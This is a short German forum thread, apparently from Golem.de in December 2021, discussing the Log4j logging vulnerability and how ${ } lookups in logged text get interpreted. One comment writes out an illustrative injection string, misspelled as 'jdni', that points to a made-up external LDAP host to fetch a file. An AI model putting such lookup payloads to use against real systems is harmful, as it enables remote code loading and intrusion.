1. Foren
  2. Kommentare
  3. Security-Forum
  4. Alle Kommentare zum Artikel
  5. › Java: Log4J-Lücke bedroht…

Jetzt sieht man endlich ...

Neue Foren im Freiraum! Raumfahrt und freie Software haben jetzt einen Platz, die Games tummeln sich jetzt alle in einem Forum.
  1. Thema

Neues Thema


  1. Jetzt sieht man endlich ...

    Autor: mhstar 13.12.21 - 09:06

    ... was alles protokolliert wird.

    Im Minecraft privaten Chat ${jdni:....} sagen - Datei abgeholt - alles klar: die private Chatnachricht wurde in einem Log verewigt.

    Dateiname ${jdni:...} - alles klar, das wurde protokolliert.
    Was ist wenn in der Datei selbst auch irgendwo ${jdni:ldap://china-freedom-alqaeda.pron.de/top_secret.txt} steht - holt sich das auch gleich der Log-Server gewissenhaft ab?

    Vielleicht gibt's da ja Selektoren ... ;)

  2. Re: Jetzt sieht man endlich ...

    Autor: bofhl 13.12.21 - 12:34

    mhstar schrieb:
    --------------------------------------------------------------------------------
    > ... was alles protokolliert wird.
    >
    > Im Minecraft privaten Chat ${jdni:....} sagen - Datei abgeholt - alles
    > klar: die private Chatnachricht wurde in einem Log verewigt.
    >
    > Dateiname ${jdni:...} - alles klar, das wurde protokolliert.
    > Was ist wenn in der Datei selbst auch irgendwo
    > ${jdni:ldap://china-freedom-alqaeda.pron.de/top_secret.txt} steht - holt
    > sich das auch gleich der Log-Server gewissenhaft ab?
    >
    > Vielleicht gibt's da ja Selektoren ... ;)

    Es geht um den Text, der geloggt wird! Der wird durch ein so genanntes Lookup einer Interpretation zugeführt, die dann das Problem verursacht! Kurz gesagt wird der über die Logging-Methode erzeugten Text (kann auch aus Pattern+Argumente erzeugt worden sein) danach nach ${ }-Folgen durchsucht und diese INTERPRETIERT!

  1. Thema

Neues Thema


Um zu kommentieren, loggen Sie sich bitte ein oder registrieren Sie sich. Sie müssen ausserdem in Ihrem Account-Profil unter Forum einen Nutzernamen vergeben haben. Zum Login

Stellenmarkt
  1. SAP Logistik Berater (m/w/x)
    über duerenhoff GmbH, Raum Bonn
  2. Mathematiker*innen / Informatiker*innen - Softwareentwicklung von Optimierungslösungen
    Fraunhofer-Institut für Algorithmen und Wissenschaftliches Rechnen SCAI, Sankt Augustin
  3. IT Spezialistinnen/IT-Spezialis- ten für das Team Ressortübergreifende Verschlusssachen-Kommunikati- on ... (m/w/d)
    Auswärtiges Amt, Bonn, Berlin
  4. IT Support Mitarbeiter/in (m/w/d)
    Johannes Gutenberg-Universität Mainz, Mainz

Detailsuche


Golem pur
  • Golem.de ohne Werbung nutzen

Anzeige
Hardware-Angebote
  1. 399,99€


Haben wir etwas übersehen?

E-Mail an news@golem.de